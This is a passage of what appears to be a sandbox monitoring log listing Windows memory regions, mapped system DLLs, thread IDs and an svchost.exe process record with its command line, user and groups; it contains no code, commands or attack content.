	            name = "private_0x0000026219130000"
	        filename = ""

Region:
	              id = 2353
	        start_va = 0x262193e0000
	          end_va = 0x262193effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000262193e0000"
	        filename = ""

Region:
	              id = 2354
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2355
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2356
	        start_va = 0x26219300000
	          end_va = 0x262193bffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000026219300000"
	        filename = ""

Region:
	              id = 2357
	        start_va = 0x262193c0000
	          end_va = 0x262193c1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000262193c0000"
	        filename = ""

Region:
	              id = 2358
	        start_va = 0x262193d0000
	          end_va = 0x262193d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000262193d0000"
	        filename = ""

Region:
	              id = 2359
	        start_va = 0x262193f0000
	          end_va = 0x26219577fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000262193f0000"
	        filename = ""

Region:
	              id = 2360
	        start_va = 0x26219580000
	          end_va = 0x26219700fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000026219580000"
	        filename = ""

Region:
	              id = 2361
	        start_va = 0x26219710000
	          end_va = 0x26219710fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000026219710000"
	        filename = ""

Region:
	              id = 2362
	        start_va = 0x26219720000
	          end_va = 0x26219720fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000026219720000"
	        filename = ""

Region:
	              id = 2363
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2364
	        start_va = 0x26219730000
	          end_va = 0x26219730fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000026219730000"
	        filename = ""

Region:
	              id = 2365
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 2366
	        start_va = 0x26219740000
	          end_va = 0x26219740fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000026219740000"
	        filename = ""

Region:
	              id = 2367
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 2368
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2369
	        start_va = 0x83dba80000
	          end_va = 0x83dbafffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083dba80000"
	        filename = ""

Region:
	              id = 2370
	        start_va = 0x83dbb00000
	          end_va = 0x83dbb7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083dbb00000"
	        filename = ""

Region:
	              id = 2371
	        start_va = 0x83dbb80000
	          end_va = 0x83dbbfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083dbb80000"
	        filename = ""

Region:
	              id = 2372
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 2373
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 2374
	        start_va = 0x7ffc17080000
	          end_va = 0x7ffc17087fff
	     entry_point = 0x7ffc17080000
	     region_type = mapped_file
	            name = "psapi.dll"
	        filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")

Region:
	              id = 2444
	        start_va = 0x83dbc00000
	          end_va = 0x83dbc7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000083dbc00000"
	        filename = ""

Region:
	              id = 2445
	        start_va = 0x26219750000
	          end_va = 0x26219a86fff
	     entry_point = 0x26219750000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2446
	        start_va = 0x7ffc12f10000
	          end_va = 0x7ffc12f40fff
	     entry_point = 0x7ffc12f10000
	     region_type = mapped_file
	            name = "ntmarta.dll"
	        filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")

Region:
	              id = 2447
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2448
	        start_va = 0x26219a90000
	          end_va = 0x26219b8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000026219a90000"
	        filename = ""

Region:
	              id = 2449
	        start_va = 0x7ffbfc860000
	          end_va = 0x7ffbfc8fbfff
	     entry_point = 0x7ffbfc860000
	     region_type = mapped_file
	            name = "efswrt.dll"
	        filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll")

Region:
	              id = 2450
	        start_va = 0x7ffc0efd0000
	          end_va = 0x7ffc0f105fff
	     entry_point = 0x7ffc0efd0000
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")

Region:
	              id = 2451
	        start_va = 0x7ffc14740000
	          end_va = 0x7ffc147f4fff
	     entry_point = 0x7ffc14740000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 2452
	        start_va = 0x7ffc05560000
	          end_va = 0x7ffc055affff
	     entry_point = 0x7ffc05560000
	     region_type = mapped_file
	            name = "edputil.dll"
	        filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll")

Region:
	              id = 2453
	        start_va = 0x7ffc173a0000
	          end_va = 0x7ffc173f1fff
	     entry_point = 0x7ffc173a0000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")


Thread:
	id = 208
	os_tid = 0xe48


Thread:
	id = 231
	os_tid = 0xd74


Thread:
	id = 232
	os_tid = 0xe38


Thread:
	id = 233
	os_tid = 0xe34


Thread:
	id = 234
	os_tid = 0xe40


Thread:
	id = 235
	os_tid = 0xb2c


Thread:
	id = 248
	os_tid = 0x77c


Thread:
	id = 250
	os_tid = 0xca8


Process:
	id = "12"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x48028000"
	os_pid = "0x348"
	os_integrity_level = "0x4000"
	os_privileges = "0x60800000"
	monitor_reason = "rpc_server"
	parent_id = "5"
	os_parent_pid = "0x3b8"
	cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\Local Service"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c094" [0xc000000f], "LOCAL" [0x7]

Region:
	              id = 2190
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2191
	        start_va = 0x6dc6ac0000
	          end_va = 0x6dc6b3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc6ac0000"
	        filename = ""

Region:
	              id = 2192
	        start_va = 0x6dc6c00000
	          end_va = 0x6dc6dfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc6c00000"
	        filename = ""

Region:
	              id = 2193
	        start_va = 0x6dc7100000
	          end_va = 0x6dc71fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7100000"
	        filename = ""

Region:
	              id = 2194
	        start_va = 0x6dc7200000
	          end_va = 0x6dc727ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7200000"
	        filename = ""

Region:
	              id = 2195
	        start_va = 0x6dc7280000
	          end_va = 0x6dc72fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7280000"
	        filename = ""

Region:
	              id = 2196
	        start_va = 0x6dc7300000
	          end_va = 0x6dc737ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7300000"
	        filename = ""

Region:
	              id = 2197
	        start_va = 0x6dc7380000
	          end_va = 0x6dc73fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7380000"
	        filename = ""

Region:
	              id = 2198
	        start_va = 0x6dc7400000
	          end_va = 0x6dc747ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7400000"
	        filename = ""

Region:
	              id = 2199
	        start_va = 0x6dc7680000
	          end_va = 0x6dc777ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7680000"
	        filename = ""

Region:
	              id = 2200
	        start_va = 0x6dc7780000
	          end_va = 0x6dc77fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7780000"
	        filename = ""

Region:
	              id = 2201
	        start_va = 0x6dc7900000
	          end_va = 0x6dc797ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7900000"
	        filename = ""

Region:
	              id = 2202
	        start_va = 0x6dc7980000
	          end_va = 0x6dc7a7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7980000"
	        filename = ""

Region:
	              id = 2203
	        start_va = 0x6dc7a80000
	          end_va = 0x6dc7b7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7a80000"
	        filename = ""

Region:
	              id = 2204
	        start_va = 0x6dc7b80000
	          end_va = 0x6dc7c7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7b80000"
	        filename = ""

Region:
	              id = 2205
	        start_va = 0x6dc7c80000
	          end_va = 0x6dc7d7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc7c80000"
	        filename = ""

Region:
	              id = 2206
	        start_va = 0x6dc8180000
	          end_va = 0x6dc81fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc8180000"
	        filename = ""

Region:
	              id = 2207
	        start_va = 0x6dc8900000
	          end_va = 0x6dc89fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc8900000"
	        filename = ""

Region:
	              id = 2208
	        start_va = 0x6dc8a00000
	          end_va = 0x6dc8afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc8a00000"
	        filename = ""

Region:
	              id = 2209
	        start_va = 0x6dc9000000
	          end_va = 0x6dc90fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc9000000"
	        filename = ""

Region:
	              id = 2210
	        start_va = 0x6dc9280000
	          end_va = 0x6dc937ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc9280000"
	        filename = ""

Region:
	              id = 2211
	        start_va = 0x6dc9380000
	          end_va = 0x6dc947ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc9380000"
	        filename = ""

Region:
	              id = 2212
	        start_va = 0x6dc9480000
	          end_va = 0x6dc957ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc9480000"
	        filename = ""

Region:
	              id = 2213
	        start_va = 0x6dc9580000
	          end_va = 0x6dc95fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000006dc9580000"
	        filename = ""

Region:
	              id = 2214
	        start_va = 0x1e3b04e0000
	          end_va = 0x1e3b04effff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b04e0000"
	        filename = ""

Region:
	              id = 2215
	        start_va = 0x1e3b04f0000
	          end_va = 0x1e3b04f1fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b04f0000"
	        filename = ""

Region:
	              id = 2216
	        start_va = 0x1e3b0500000
	          end_va = 0x1e3b0514fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0500000"
	        filename = ""

Region:
	              id = 2217
	        start_va = 0x1e3b0520000
	          end_va = 0x1e3b0523fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0520000"
	        filename = ""

Region:
	              id = 2218
	        start_va = 0x1e3b0530000
	          end_va = 0x1e3b0530fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0530000"
	        filename = ""

Region:
	              id = 2219
	        start_va = 0x1e3b0540000
	          end_va = 0x1e3b0541fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0540000"
	        filename = ""

Region:
	              id = 2220
	        start_va = 0x1e3b0550000
	          end_va = 0x1e3b0550fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0550000"
	        filename = ""

Region:
	              id = 2221
	        start_va = 0x1e3b0560000
	          end_va = 0x1e3b0560fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0560000"
	        filename = ""

Region:
	              id = 2222
	        start_va = 0x1e3b0570000
	          end_va = 0x1e3b0570fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0570000"
	        filename = ""

Region:
	              id = 2223
	        start_va = 0x1e3b0580000
	          end_va = 0x1e3b05e3fff
	     entry_point = 0x1e3b0580000
	     region_type = mapped_file
	            name = "wevtapi.dll"
	        filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")

Region:
	              id = 2224
	        start_va = 0x1e3b05f0000
	          end_va = 0x1e3b05f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b05f0000"
	        filename = ""

Region:
	              id = 2225
	        start_va = 0x1e3b0600000
	          end_va = 0x1e3b06fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0600000"
	        filename = ""

Region:
	              id = 2226
	        start_va = 0x1e3b0700000
	          end_va = 0x1e3b07bdfff
	     entry_point = 0x1e3b0700000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2227
	        start_va = 0x1e3b07c0000
	          end_va = 0x1e3b0947fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b07c0000"
	        filename = ""

Region:
	              id = 2228
	        start_va = 0x1e3b0950000
	          end_va = 0x1e3b0950fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0950000"
	        filename = ""

Region:
	              id = 2229
	        start_va = 0x1e3b0960000
	          end_va = 0x1e3b0966fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0960000"
	        filename = ""

Region:
	              id = 2230
	        start_va = 0x1e3b0970000
	          end_va = 0x1e3b098ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0970000"
	        filename = ""

Region:
	              id = 2231
	        start_va = 0x1e3b0990000
	          end_va = 0x1e3b09affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0990000"
	        filename = ""

Region:
	              id = 2232
	        start_va = 0x1e3b09b0000
	          end_va = 0x1e3b09cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b09b0000"
	        filename = ""

Region:
	              id = 2233
	        start_va = 0x1e3b09d0000
	          end_va = 0x1e3b09d0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b09d0000"
	        filename = ""

Region:
	              id = 2234
	        start_va = 0x1e3b09e0000
	          end_va = 0x1e3b09e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b09e0000"
	        filename = ""

Region:
	              id = 2235
	        start_va = 0x1e3b09f0000
	          end_va = 0x1e3b09f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b09f0000"
	        filename = ""

Region:
	              id = 2236
	        start_va = 0x1e3b0a00000
	          end_va = 0x1e3b0afffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b0a00000"
	        filename = ""

Region:
	              id = 2237
	        start_va = 0x1e3b0b00000
	          end_va = 0x1e3b0c80fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0b00000"
	        filename = ""

Region:
	              id = 2238
	        start_va = 0x1e3b0c90000
	          end_va = 0x1e3b0d4ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0c90000"
	        filename = ""

Region:
	              id = 2239
	        start_va = 0x1e3b0d50000
	          end_va = 0x1e3b114afff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b0d50000"
	        filename = ""

Region:
	              id = 2240
	        start_va = 0x1e3b1150000
	          end_va = 0x1e3b1150fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b1150000"
	        filename = ""

Region:
	              id = 2241
	        start_va = 0x1e3b1160000
	          end_va = 0x1e3b1160fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e3b1160000"
	        filename = ""

Region:
	              id = 2242
	        start_va = 0x1e3b1170000
	          end_va = 0x1e3b1170fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1170000"
	        filename = ""

Region:
	              id = 2243
	        start_va = 0x1e3b1230000
	          end_va = 0x1e3b1236fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1230000"
	        filename = ""

Region:
	              id = 2244
	        start_va = 0x1e3b12f0000
	          end_va = 0x1e3b12f6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b12f0000"
	        filename = ""

Region:
	              id = 2245
	        start_va = 0x1e3b1300000
	          end_va = 0x1e3b13fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1300000"
	        filename = ""

Region:
	              id = 2246
	        start_va = 0x1e3b1400000
	          end_va = 0x1e3b14fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1400000"
	        filename = ""

Region:
	              id = 2247
	        start_va = 0x1e3b1500000
	          end_va = 0x1e3b15fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1500000"
	        filename = ""

Region:
	              id = 2248
	        start_va = 0x1e3b1600000
	          end_va = 0x1e3b16fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1600000"
	        filename = ""

Region:
	              id = 2249
	        start_va = 0x1e3b1700000
	          end_va = 0x1e3b17fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1700000"
	        filename = ""

Region:
	              id = 2250
	        start_va = 0x1e3b1800000
	          end_va = 0x1e3b1b36fff
	     entry_point = 0x1e3b1800000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2251
	        start_va = 0x1e3b1b40000
	          end_va = 0x1e3b1c1ffff
	     entry_point = 0x1e3b1b40000
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")

Region:
	              id = 2252
	        start_va = 0x1e3b1d00000
	          end_va = 0x1e3b1dfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1d00000"
	        filename = ""

Region:
	              id = 2253
	        start_va = 0x1e3b1e00000
	          end_va = 0x1e3b1efffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1e00000"
	        filename = ""

Region:
	              id = 2254
	        start_va = 0x1e3b1f00000
	          end_va = 0x1e3b1ffffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b1f00000"
	        filename = ""

Region:
	              id = 2255
	        start_va = 0x1e3b2000000
	          end_va = 0x1e3b20fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2000000"
	        filename = ""

Region:
	              id = 2256
	        start_va = 0x1e3b2100000
	          end_va = 0x1e3b21fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2100000"
	        filename = ""

Region:
	              id = 2257
	        start_va = 0x1e3b2200000
	          end_va = 0x1e3b22fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2200000"
	        filename = ""

Region:
	              id = 2258
	        start_va = 0x1e3b2300000
	          end_va = 0x1e3b23fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2300000"
	        filename = ""

Region:
	              id = 2259
	        start_va = 0x1e3b2400000
	          end_va = 0x1e3b24fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2400000"
	        filename = ""

Region:
	              id = 2260
	        start_va = 0x1e3b2600000
	          end_va = 0x1e3b26fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2600000"
	        filename = ""

Region:
	              id = 2261
	        start_va = 0x1e3b2700000
	          end_va = 0x1e3b27fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2700000"
	        filename = ""

Region:
	              id = 2262
	        start_va = 0x1e3b2800000
	          end_va = 0x1e3b28fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e3b2800000"
	        filename = ""

Region:
	              id = 2263
	        start_va = 0x7df5ff590000
	          end_va = 0x7ff5ff58ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff590000"
	        filename = ""

Region:
	              id = 2264
	        start_va = 0x7ff795330000
	          end_va = 0x7ff79542ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff795330000"
	        filename = ""

Region:
	              id = 2265
	        start_va = 0x7ff795430000
	          end_va = 0x7ff795452fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff795430000"
	        filename = ""

Region:
	              id = 2266
	        start_va = 0x7ff795570000
	          end_va = 0x7ff79557cfff
	     entry_point = 0x7ff795570000
	     region_type = mapped_file
	            name = "svchost.exe"
	        filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")

Region:
	              id = 2267
	        start_va = 0x7ffbf6210000
	          end_va = 0x7ffbf6242fff
	     entry_point = 0x7ffbf6210000
	     region_type = mapped_file
	            name = "wscsvc.dll"
	        filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")

Region:
	              id = 2268
	        start_va = 0x7ffbfea40000
	          end_va = 0x7ffbfebf7fff
	     entry_point = 0x7ffbfea40000
	     region_type = mapped_file
	            name = "wmalfxgfxdsp.dll"
	        filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll")

Region:
	              id = 2269
	        start_va = 0x7ffbff360000
	          end_va = 0x7ffbff3e7fff
	     entry_point = 0x7ffbff360000
	     region_type = mapped_file
	            name = "audioses.dll"
	        filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")

Region:
	              id = 2270
	        start_va = 0x7ffbff990000
	          end_va = 0x7ffbffa9cfff
	     entry_point = 0x7ffbff990000
	     region_type = mapped_file
	            name = "mfplat.dll"
	        filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll")

Region:
	              id = 2271
	        start_va = 0x7ffc023c0000
	          end_va = 0x7ffc023eafff
	     entry_point = 0x7ffc023c0000
	     region_type = mapped_file
	            name = "rtworkq.dll"
	        filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll")

Region:
	              id = 2272
	        start_va = 0x7ffc06410000
	          end_va = 0x7ffc06423fff
	     entry_point = 0x7ffc06410000
	     region_type = mapped_file
	            name = "wbemsvc.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")

Region:
	              id = 2273
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 2274
	        start_va = 0x7ffc06ac0000
	          end_va = 0x7ffc06ad5fff
	     entry_point = 0x7ffc06ac0000
	     region_type = mapped_file
	            name = "napinsp.dll"
	        filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")

Region:
	              id = 2275
	        start_va = 0x7ffc06ae0000
	          end_va = 0x7ffc06af9fff
	     entry_point = 0x7ffc06ae0000
	     region_type = mapped_file
	            name = "pnrpnsp.dll"
	        filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")

Region:
	              id = 2276
	        start_va = 0x7ffc06b00000
	          end_va = 0x7ffc06b0cfff
	     entry_point = 0x7ffc06b00000
	     region_type = mapped_file
	            name = "winrnr.dll"
	        filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")

Region:
	              id = 2277
	        start_va = 0x7ffc06b80000
	          end_va = 0x7ffc06b90fff
	     entry_point = 0x7ffc06b80000
	     region_type = mapped_file
	            name = "wbemprox.dll"
	        filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")

Region:
	              id = 2278
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 2279
	        start_va = 0x7ffc0ad10000
	          end_va = 0x7ffc0ad19fff
	     entry_point = 0x7ffc0ad10000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")

Region:
	              id = 2280
	        start_va = 0x7ffc0c360000
	          end_va = 0x7ffc0c3c6fff
	     entry_point = 0x7ffc0c360000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")

Region:
	              id = 2281
	        start_va = 0x7ffc0c420000
	          end_va = 0x7ffc0c42dfff
	     entry_point = 0x7ffc0c420000
	     region_type = mapped_file
	            name = "cmintegrator.dll"
	        filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll")

Region:
	              id = 2282
	        start_va = 0x7ffc0c430000
	          end_va = 0x7ffc0c43afff
	     entry_point = 0x7ffc0c430000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")

Region:
	              id = 2283
	        start_va = 0x7ffc0c440000
	          end_va = 0x7ffc0c487fff
	     entry_point = 0x7ffc0c440000
	     region_type = mapped_file
